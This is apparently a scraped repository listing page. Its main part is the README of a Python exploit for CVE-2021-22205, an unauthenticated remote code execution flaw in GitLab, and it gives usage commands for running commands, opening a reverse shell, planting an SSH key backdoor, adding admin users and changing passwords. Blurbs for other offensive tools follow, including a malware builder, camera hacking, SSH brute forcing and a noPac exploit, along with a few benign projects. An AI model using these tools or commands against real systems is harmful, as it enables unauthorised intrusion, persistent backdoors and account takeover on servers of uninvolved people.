GitLab CE/EE Preauth RCE using ExifTool

Related tags

Security related resourcesgitlabpentest-scriptscve-2021-22205preauth-rce
Overview

CVE-2021-22205

GitLab CE/EE Preauth RCE using ExifTool

This project is for learning only, if someone's rights have been violated, please contact me to remove the project, and the last DO NOT USE IT ILLEGALLY If you have any illegal behavior in the process of using this tool, you will bear all the consequences yourself. All developers and all contributors of this tool do not bear any legal and joint liabilities

Description

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Affect Versions:

  • >=11.9, <13.8.8
  • >=13.9, <13.9.6
  • >=13.10, <13.10.3

Features

  • Gitlab version detection through the hash in Webpack manifest.json

  • Automatical out-of-band interactions with DNSLog & PostBin

  • Support Reverse Bash Shell / Append SSH Key to authorized_keys

  • Support ENTER to modify and restore gitlab user password

Usage

๐Ÿš โ€บโ€บโ€บ python CVE-2021-22205.py

      โ–‘โ–‘โ–‘โ–‘โ–โ–โ–‘โ–‘โ–‘  CVE-2021-22205
 โ–  โ–‘โ–‘โ–‘โ–‘โ–‘โ–„โ–ˆโ–ˆโ–„โ–„  GitLab CE/EE Unauthenticated RCE using ExifTool
  โ–€โ–€โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–€โ–‘โ–‘  Affecting all versions starting from 11.9
  โ–‘โ–‘โ–โ–โ–‘โ–‘โ–โ–โ–‘โ–‘  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 โ–’โ–’โ–’โ–โ–โ–’โ–’โ–โ–โ–’  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # ็‰ˆๆœฌ & ๆผๆดžๆŽขๆต‹
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # ๅ‘ฝไปคๆ‰ง่กŒ OOB ๅ›žๆ˜พ
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # ๅ‘ฝไปคๆ‰ง่กŒๅ†™ๆ–‡ไปถๅ›žๆ˜พ
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # ๅๅผน SHELL
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # SSH ๅŽ้—จๆคๅ…ฅ
    python3 CVE-2021-22205.py -u site_url -m add user pass # ๆทปๅŠ ็ฎก็†็”จๆˆท
    python3 CVE-2021-22205.py -u site_url -m mod user      # ไฟฎๆ”น user ๅฏ†็  => [email protected]
    python3 CVE-2021-22205.py -u site_url -m rec user      # ่ฟ˜ๅŽŸ user ๅฏ†็ 

Screenshot

Detect:

image-20211111130659726

RCE(Echo via PostBin OOB):

image-20211111132623307

Reverse Bash Shell:

image-20211111131442470

Append SSH Key to authorized_keys:

image-20211111133555010

Gitlab user password modification and restoration:

image-20211111132115090

Reference

Owner
3ND
3ND
GitHub Repository
Hack computer in the form of RAR files from all types of clients, even Linux

Program Features ๐Ÿ“Œ Hide malware ๐Ÿ“Œ Vulnerability software vulnerabilities RAR ๐Ÿ“Œ Creating malware ๐Ÿ“Œ Access client files ๐Ÿ“Œ Client Hacking ๐Ÿ“Œ Link Do

hack4lx 5 Nov 25, 2022
FOSSLight Scanner performs open source analysis after downloading the source by passing a link that can be cloned by wget or git.

FOSSLight Scanner Analyze at once for Open Source Compliance. FOSSLight Scanner performs open source analysis after downloading the source by passing

FOSSLight 8 Nov 03, 2022
CC CAMERA HACKING TOOL

CAM-HACK CC CAMERA HACKING TOOL Installation On Termux $ apt update

Aryan 10 Sep 25, 2022
PoC for CVE-2021-26855 -Just a checker-

CVE-2021-26855 PoC for CVE-2021-26855 -Just a checker- Usage python3 CVE-2021-26855.py -u https://mail.example.com -c example.burpcollaborator.net # C

Abdullah AlZahrani 17 Dec 22, 2022
It's a simple tool for test vulnerability Apache Path Traversal

SimplesApachePathTraversal Simples Apache Path Traversal It's a simple tool for test vulnerability Apache Path Traversal https://blog.mrcl0wn.com/2021

Mr. Cl0wn - H4ck1ng C0d3r 56 Dec 27, 2022
Program that mathematically generates and validates CPF numbers

โœ”๏ธ Gerador e Validador de CPF Programa que gera e valida nรบmeros de CPF Requisitos โ€ข Como usar โ€ข Capturas de Tela Requisitos Antes de comeรงar, vocรช va

Joรฃo Victor Vilela dos Santos 1 Nov 07, 2021
A simple way to store your passwords without requiring third party applications

SimplePasswordManager A simple way to store your passwords without requiring third party applications Simple To Use. Store Your Passwords For Each Web

Leone Odinga 1 Dec 23, 2021
This repo explains in details about buffer overflow exploit development for windows executable.

Buffer Overflow Exploit Development For Beginner Introduction I am beginner in security community and as my fellow beginner, I spend some of my time a

cris_0xC0 11 Dec 17, 2022
Repository for a project of the course EP2520 Building Networked Systems Security

EP2520_ACME_Project Repository for a project of the course EP2520 Building Networked Systems Security in Royal Institute of Technology (KTH), Stockhol

1 Dec 11, 2021
Click-Jack - Automatic tool to find Clickjacking Vulnerability in various Web applications

CLICK-Jack It is a automatic tool to find Clickjacking Vulnerability in various

Prince Prafull 4 Jan 10, 2022
PyExtractor is a decompiler that can fully decompile exe's compiled with pyinstaller or py2exe

PyExtractor is a decompiler that can fully decompile exe's compiled with pyinstaller or py2exe with additional features such as malware checker/detector! Also checks file(s) for suspicious words, dis

Rdimo 56 Jul 31, 2022
AmiEviL - This program uses the Virus Total API to determine if your suspicious file is malicious or not

AmiEviL - This program uses the Virus Total API to determine if your suspicious file is malicious or not. The program requests the hash of the file and outputs information (if any). This version will

Kirk 1 Jan 03, 2022
A tool to extract the IdP cert from vCenter backups and log in as Administrator

vCenter SAML Login Tool A tool to extract the Identity Provider (IdP) cert from vCenter backups and log in as Administrator Background Commonly, durin

Horizon 3 AI Inc 343 Dec 31, 2022
A Fast Broken Link Hijacker Tool written in Python

Broken Link Hijacker BrokenLinkHijacker(BLH) is a Fast Broken Link Hijacker Tool written in Python.

Mayank Pandey 70 Nov 30, 2022
Exploiting CVE-2021-42278 and CVE-2021-42287

noPac Exploiting CVE-2021-42278 and CVE-2021-42287 ๅŽŸ้กน็›ฎnoPacๅœจๅฎž็ŽฐไธŠๅฏ่ƒฝๆœ‰็‚น้—ฎ้ข˜๏ผŒๅฏผ่‡ดๅœจๆœฌๅœฐๆฒกๆœ‰ๆ‰“้€š๏ผŒไบŽๆ˜ฏๅ‚่€ƒsam-the-admin้กน็›ฎ่ฟ›่กŒไฟฎๆ”นใ€‚ ไฝฟ็”จ pip3 install -r requirements.txt # GetShel

W4ter 2 Jun 23, 2022
Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228

log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be

Binary Defense 144 Nov 19, 2022
A simple multi-threaded distributed SSH brute-forcing tool written in Python.

OrbitalDump A simple multi-threaded distributed SSH brute-forcing tool written in Python. How it Works When the script is executed without the --proxi

K4YT3X 408 Jan 03, 2023
MainCoon - an automated recon framework

MainCoon is an automated recon framework meant for gathering information during penetration testing of web applications.

Md. Nur habib 8 Aug 26, 2022
ShoLister - a tool that collects all available subdomains for specific hostname or organization from Shodan

ShoLister is a tool that collects all available subdomains for specific hostname or organization from Shodan. The tool is designed to be used from Penetration Tester and Bug Bounty Hunters.

Eslam Akl 45 Dec 28, 2022
PwdGen is a Python Tkinter tool for generating secure 16 digit passwords.

PwdGen ( Password Generator ) is a Python Tkinter tool for generating secure 16 digit passwords. Installation Simply install requirements pip install

zJairO 7 Jul 14, 2022